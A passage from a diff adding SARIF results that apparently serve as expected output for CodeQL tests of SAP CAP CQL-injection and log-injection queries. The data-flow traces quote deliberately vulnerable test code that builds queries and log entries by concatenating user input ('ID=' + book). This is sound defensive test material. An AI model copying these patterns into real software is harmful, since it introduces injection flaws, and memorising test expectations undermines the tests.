"locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 50, + "endColumn" : 54 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 44, + "endColumn" : 56 + } + }, + "message" : { + "text" : "`ID=${book}`" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 19, + "endColumn" : 57 + } + }, + "message" : { + "text" : "SELECT. ... book}`)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 11, + "endColumn" : 57 + } + }, + "message" : { + "text" : "query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 13, + "startColumn" : 36, + "endColumn" : 41 + } + }, + "message" : { + "text" : "query" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 27, + "endColumn" : 65 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "b41554298e90b620:1", + "primaryLocationStartColumnFingerprint" : "20" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 58, + "endColumn" : 62 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 52, + "endColumn" : 64 + } + }, + "message" : { + "text" : "`ID=${book}`" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 27, + "endColumn" : 65 + } + }, + "message" : { + "text" : "SELECT. ... book}`)" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 18, + "startColumn" : 37, + "endColumn" : 43 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "967d7be3edc97a9e:1", + "primaryLocationStartColumnFingerprint" : "30" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 17, + "startColumn" : 53, + "endColumn" : 57 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 17, + "startColumn" : 45, + "endColumn" : 57 + } + }, + "message" : { + "text" : "'ID=' + book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 17, + "startColumn" : 20, + "endColumn" : 58 + } + }, + "message" : { + "text" : "SELECT. ... + book)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 17, + "startColumn" : 11, + "endColumn" : 58 + } + }, + "message" : { + "text" : "query2" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 18, + "startColumn" : 37, + "endColumn" : 43 + } + }, + "message" : { + "text" : "query2" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 65 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "1c132adaa6986472:1", + "primaryLocationStartColumnFingerprint" : "20" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 60, + "endColumn" : 64 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 52, + "endColumn" : 64 + } + }, + "message" : { + "text" : "'ID=' + book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 65 + } + }, + "message" : { + "text" : "SELECT. ... + book)" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 28, + "startColumn" : 39, + "endColumn" : 42 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "144d55d233768c80:1", + "primaryLocationStartColumnFingerprint" : "32" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 27, + "startColumn" : 59, + "endColumn" : 63 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 27, + "startColumn" : 17, + "endColumn" : 63 + } + }, + "message" : { + "text" : "CQL`SEL ... + book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 27, + "startColumn" : 11, + "endColumn" : 63 + } + }, + "message" : { + "text" : "cqn" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 28, + "startColumn" : 39, + "endColumn" : 42 + } + }, + "message" : { + "text" : "cqn" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 31, + "startColumn" : 39, + "endColumn" : 43 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "1cd6f1adc2ef8f7c:1", + "primaryLocationStartColumnFingerprint" : "32" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 56, + "endColumn" : 60 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 32, + "endColumn" : 60 + } + }, + "message" : { + "text" : "`SELECT ... + book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 18, + "endColumn" : 61 + } + }, + "message" : { + "text" : "cds.par ... + book)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 11, + "endColumn" : 61 + } + }, + "message" : { + "text" : "cqn1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 31, + "startColumn" : 39, + "endColumn" : 43 + } + }, + "message" : { + "text" : "cqn1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 11, + "startColumn" : 16, + "endColumn" : 29 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "eae426bf8fad0192:1", + "primaryLocationStartColumnFingerprint" : "9" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 11, + "startColumn" : 25, + "endColumn" : 29 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 11, + "startColumn" : 16, + "endColumn" : 29 + } + }, + "message" : { + "text" : "\"CAP:\" + book" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + 